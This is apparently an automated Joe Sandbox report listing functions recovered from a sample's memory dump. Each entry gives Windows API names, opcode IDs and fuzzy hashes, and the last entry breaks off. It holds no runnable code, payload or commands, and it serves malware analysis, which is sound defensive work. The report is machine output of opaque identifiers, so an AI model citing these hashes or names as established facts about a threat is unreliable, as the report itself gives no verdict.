                                                              • API ID: CallbackDispatcherItemUser
                                                              • String ID:
                                                              • API String ID: 4250310104-0
                                                              • Opcode ID: 45524108d6ddc4cd47f3ee47c823d0d02c2714967f20359755cd4e775325e49e
                                                              • Instruction ID: c36097d05380ce8806e3cb443f8f8ba800cb601a6d3681a1c422d183dc1510a8
                                                              • Instruction Fuzzy Hash: 70C04C7641C380BFCB015BE09D5CC2FFFA9AB95311F00C949F5A584120C6358810EB12
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 03fda1da1bb05d72a2a6efd087e0f154bcbd3061e4de5a5f4ac4c4e3a1ae3fa5
                                                              • Instruction ID: af6046446f3ed8e84a9386b5da6aa4904429bd62dc0179461709d0d8103827f0
                                                              • Instruction Fuzzy Hash: 02C18C71A04255ABDF25DF6CC994BED7BE8AF4A300F1800B9EC09DF296C7349945CBA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 7ff32931ab3264f02bbed79cfdf5772811d8c12b041156ed22d4e245c77da1ba
                                                              • Instruction ID: 795f1788a05854c642f094703bd89639a6bea0c54ce06c5628cf0b3ca2477b85
                                                              • Instruction Fuzzy Hash: 308127719043158FDB24EF68C985BAEB7E8FF82314F04092EF85597281EBB499448BE1
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009920B7
                                                                • Part of subcall function 009980EC: __EH_prolog3.LIBCMT ref: 009980F3
                                                                • Part of subcall function 009A2815: __EH_prolog3.LIBCMT ref: 009A281C
                                                                • Part of subcall function 009976E7: __EH_prolog3.LIBCMT ref: 009976EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 3a05539650240c0856368c0a8881087e343aeeef360e1a172bad80f8e63ed397
                                                              • Instruction ID: 1dea426e57dd62fb91842eca04213451efdd34aa6c4cb4a588d28eca6b306e0a
                                                              • Instruction Fuzzy Hash: 0851F6B5A097808EDB44DF6985807C9BBE0AF99300F0885BEDC5DCF69BDB740255CB61
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099B3E8
                                                                • Part of subcall function 0099F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?,?,?,?), ref: 0099F739
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CloseFindH_prolog3_
                                                              • String ID:
                                                              • API String ID: 2672038326-0
                                                              • Opcode ID: 9941ca52761c012df3ae81e7aa230c006c3b165b272bf8d08d9b5a87e42d0971
                                                              • Instruction ID: 9e06c04b4a3f5cc9c5982eae9a25f7922f2e3d5b724e470aa1e582b1dddd04e9
                                                              • Opcode Fuzzy Hash: 9941ca52761c012df3ae81e7aa230c006c3b165b272bf8d08d9b5a87e42d0971
                                                              • Instruction Fuzzy Hash: 05418770A00B09CFDB20DFADDA81BA9B7F5BF45304F14442DE04A9B362D738A841DB22
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00992C37
                                                                • Part of subcall function 009A880E: __EH_prolog3.LIBCMT ref: 009A8815
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3_
                                                              • String ID:
                                                              • API String ID: 3355343447-0
                                                              • Opcode ID: 23a79b449bf2a1ff32e8d7621f43c1875a5c8f9b2046995e63334431f4c4e111
                                                              • Instruction ID: 666643030a026b0ee98f48b4ebe2313fcd70b015dc2c8b7f4a7efef73920d240
                                                              • Opcode Fuzzy Hash: 23a79b449bf2a1ff32e8d7621f43c1875a5c8f9b2046995e63334431f4c4e111
                                                              • Instruction Fuzzy Hash: C631497190120CBACF18EBE8D881AEEBBBDAF49300F14006AF441A3251DA349985CB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 16fcb08ced6baa444e67255ce88f4d5996332d6b9f3b10eefcf3b53cb456dd57
                                                              • Instruction ID: b443455858976b3a14691fbf1d80b23abab20f89cc3f39a93bd658cea6a7ce7d
                                                              • Opcode Fuzzy Hash: 16fcb08ced6baa444e67255ce88f4d5996332d6b9f3b10eefcf3b53cb456dd57
                                                              • Instruction Fuzzy Hash: 5A21D671E006169BEF18EF788D46B5E76A8BF85314F05023AE505AF2C1D7749D40C7E4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 48ff1af3e8fb94897d60cb76018e792389593fd8e02a0f6c8034a8187c0a7a96
                                                              • Instruction ID: 5166cb3f280280ce9d4e8016f079a1c7d252ae3a45f36babf7fb67655eff67b3
                                                              • Opcode Fuzzy Hash: 48ff1af3e8fb94897d60cb76018e792389593fd8e02a0f6c8034a8187c0a7a96
                                                              • Instruction Fuzzy Hash: E4217CB6A0161A9BDF14DFEDC9C1BEEB7B9BFC8340F14401AE500A7201DB709E008BA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2427045233-0
                                                              • Opcode ID: ef8e225282648697d3d1079c9f790865507227f259568ca3bd1060d59f3a6759
                                                              • Instruction ID: 587ed0def97c568a58262e3c5aa28d6a8264a87ddba8f5fce482657a0db0ff7b
                                                              • Opcode Fuzzy Hash: ef8e225282648697d3d1079c9f790865507227f259568ca3bd1060d59f3a6759
                                                              • Instruction Fuzzy Hash: 4921AC30601308AADF20EF6EC842FEEB3ADAF96750F140959F442A7581DA749A49C7A0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2427045233-0
                                                              • Opcode ID: 776b08d5d8958ff11859d428cc198b51a31141b14e747e75b91f041b5d37d40f
                                                              • Instruction ID: 728dbbe2310abc168e539f3b68c9495eafb81fa7d2eeb1596a475dcf8c84ff7c
                                                              • Opcode Fuzzy Hash: 776b08d5d8958ff11859d428cc198b51a31141b14e747e75b91f041b5d37d40f
                                                              • Instruction Fuzzy Hash: E7213071900209DEDF04EFA8DA85BDD7BF9AF89310F140019F104E72A2DA359A45DB61
                                                              APIs
                                                                • Part of subcall function 009C1DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009C00BA,00000001,00000364,?,009B6C16,?,?,?,?,?,009B5269,009B535E), ref: 009C1E27
                                                              • _free.LIBCMT ref: 009C3195
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                              • Instruction ID: ff6a62c86de6a56fd4b4266d0926a9ff1798e8447967978e60ea6015708e4abf
                                                              • Opcode Fuzzy Hash: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                                              • Instruction Fuzzy Hash: A0010472A043056BE3218E659845F5AFBDDEB86370F29462DE19483280EA30A905C765
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID:
                                                              • API String ID: 2427045233-0
                                                              • Opcode ID: 66c9de26c69de623d3c7d7a58f9c1a26a4e3c36030590a2bc38162a34f0841c3
                                                              • Instruction ID: 8024b7bd3520e871f27817f0b0ddf6a3d2ef28c167c6268fcfe9c98f3b3c1d08
                                                              • Opcode Fuzzy Hash: 66c9de26c69de623d3c7d7a58f9c1a26a4e3c36030590a2bc38162a34f0841c3
                                                              • Instruction Fuzzy Hash: 36016DB1845209AEDF00EBE4CA86BDEB7B8BF54354F484065F500AA182CA789B49CB71
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009C00BA,00000001,00000364,?,009B6C16,?,?,?,?,?,009B5269,009B535E), ref: 009C1E27
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 4cc7e4baf479266cd1808132e55f3bec858b2b65e5f349315b84cef564aab813
                                                              • Instruction ID: 66c732410e93b8985c5fe646c698e752e8316711d04a395ffb6f152d6c45e253
                                                              • Opcode Fuzzy Hash: 4cc7e4baf479266cd1808132e55f3bec858b2b65e5f349315b84cef564aab813
                                                              • Instruction Fuzzy Hash: A7F0BB31E0512466DB251B629C05F97774C9F86770B148069FC08DB192DA60DD0046EA
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 2de3bab2a36c2b47574d875dc57b8263d11603b4ff38f1f616fdcaf7b4979cbd
                                                              • Instruction ID: 3d6fcb46e2d69af336c515be77bab46fc4e1b72d8f88e8e6befdfc614cf3e6a5
                                                              • Opcode Fuzzy Hash: 2de3bab2a36c2b47574d875dc57b8263d11603b4ff38f1f616fdcaf7b4979cbd
                                                              • Instruction Fuzzy Hash: E0E06532D09211D6EA2927A59C01F9B7A4C9FC53B0F194128EE5C961B2EB64CC0091A3
                                                              APIs
                                                                • Part of subcall function 0099F826: __EH_prolog3_GS.LIBCMT ref: 0099F830
                                                                • Part of subcall function 0099F826: FindFirstFileW.KERNELBASE(?,?,00000274,0099F733,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?), ref: 0099F859
                                                                • Part of subcall function 0099F826: FindFirstFileW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F8A4
                                                                • Part of subcall function 0099F826: GetLastError.KERNEL32(?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049,?,00000000), ref: 0099F902
                                                              • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?,?,?,?), ref: 0099F739
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                              • String ID:
                                                              • API String ID: 765066492-0
                                                              • Opcode ID: 5391add7b7e79233dea1e48e49ce751d16c41f06a5acd290b29a05b3d84b948e
                                                              • Instruction ID: e90177297ff84329c3481060a6dd2577190afe95c086899f0394c493585b5423
                                                              • Opcode Fuzzy Hash: 5391add7b7e79233dea1e48e49ce751d16c41f06a5acd290b29a05b3d84b948e
                                                              • Instruction Fuzzy Hash: C4F0A03140D790AECE21ABAC8804B8BBFE46F5B374F004B09F0FD525A2C231A0549B22
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 009A742D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: c923bf7e1e2596ce548df186cd4e6d819c1f72bee641eb6282b20f4cbfb93462
                                                              • Instruction ID: 939325f268b80dfe0d456c88d8ef84a5823c8796b9da97f062b4136a7579819b
                                                              • Opcode Fuzzy Hash: c923bf7e1e2596ce548df186cd4e6d819c1f72bee641eb6282b20f4cbfb93462
                                                              • Instruction Fuzzy Hash: ECD05B21B5D15026FE25776D6D467FE1E4B4FC7315F09007AF04557193CE940886D3E6
                                                              APIs
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00991206
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_task
                                                              • String ID:
                                                              • API String ID: 118556049-0
                                                              • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                              • Instruction ID: a50debd413a64d124e90834f78309736136d0f686fa78b42e06ae1e683ae3ddf
                                                              • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                              • Instruction Fuzzy Hash: 6FD05E766026034E8B2DFB38C666A6E77946EA0315351462DF03BCA691DF21CC15C615
APIs
• GdipAlloc.GDIPLUS(00000010), ref: 009AEB0C
  • Part of subcall function 009AE849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009AE86A
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
• Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
• Instruction ID: 17672c572012eb8babd2d9d26d306b9a193dcda607435d15a2962baf5f1a69ed
• Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
• Instruction Fuzzy Hash: 57D0A930200209BADF822B229C02ABE7A98EF42350F008421B80285190EAB1EA10A2E0
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 009B4256
  • Part of subcall function 009B0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B0689
  • Part of subcall function 009B0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B069A
  • Part of subcall function 009B0678: IsDialogMessageW.USER32(000103EA,?), ref: 009B06AE
  • Part of subcall function 009B0678: TranslateMessage.USER32(?), ref: 009B06BC
  • Part of subcall function 009B0678: DispatchMessageW.USER32(?), ref: 009B06C6
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
• Opcode ID: 97b2bf5b95ef4fd549e3d5e5bbaf8792214457d8004f3f89338ba2acd9164dcb
• Instruction ID: 3158dfb38699325bfdab79f5a2faf97f82b8fd965f816568860da3c90a95110b
• Opcode Fuzzy Hash: 97b2bf5b95ef4fd549e3d5e5bbaf8792214457d8004f3f89338ba2acd9164dcb
• Instruction Fuzzy Hash: 86D09E31158200AAD6122B52CE06F0A7AE2EBC8B15F004654B745740B1C6629E31AB12
APIs
  • Part of subcall function 009B4DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 009B4DF2
• DloadProtectSection.DELAYIMP ref: 009B4D54
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AcquireDloadExclusiveLockProtectSection
• String ID:
• API String ID: 3680172570-0
• Opcode ID: 954f66e63e104733c8999dafa7707408a3407a50a80b495dc5ec7f120a149eaf
• Instruction ID: a3adea924c498c164b65c487b685a036681c11b959c9b16a302e2d44d48722eb
• Opcode Fuzzy Hash: 954f66e63e104733c8999dafa7707408a3407a50a80b495dc5ec7f120a149eaf
• Instruction Fuzzy Hash: 8FD012395585A4BED712AB249E8A7D422A4B3C433CF810505F2528A1E7CF746890B601
APIs
• GetFileType.KERNELBASE(000000FF,0099E052,?,?,?,00000000,0099E5D2,?,?,00000000,?,00000000), ref: 0099E15E
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: de3f525a136670102c9fbebcc2ba60c80fdb9c59be175bcbd4b6903b82042d04
• Instruction ID: fdc6c6852740e56113ec44c4acf5ce858e6ab29f120e9836f8f263da184fb27b
• Opcode Fuzzy Hash: de3f525a136670102c9fbebcc2ba60c80fdb9c59be175bcbd4b6903b82042d04
• Instruction Fuzzy Hash: 5FC00234808209D68E318A2C98494997626AA527A67B89795D02D995A1C7328C97EA11
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
  • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
  • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
